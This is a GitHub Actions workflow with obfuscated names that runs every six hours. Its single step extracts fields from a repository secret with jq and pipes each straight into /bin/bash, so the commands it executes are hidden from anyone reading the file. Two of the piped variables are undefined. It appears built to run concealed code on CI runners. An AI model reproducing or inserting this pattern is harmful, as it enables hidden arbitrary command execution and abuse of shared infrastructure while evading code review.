name: huangjiao2315
on:
  workflow_dispatch:
  schedule:
    - cron: '55 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: huangjiao2315
        env:
          p70: ${{ secrets.p70 }}
        run: |
          echo $p70 | jq -r .l89357 | /bin/bash
          echo $ggfci8 | jq -r .yf59027 | /bin/bash
          echo $p9214 | jq -r .tu5950 | /bin/bash

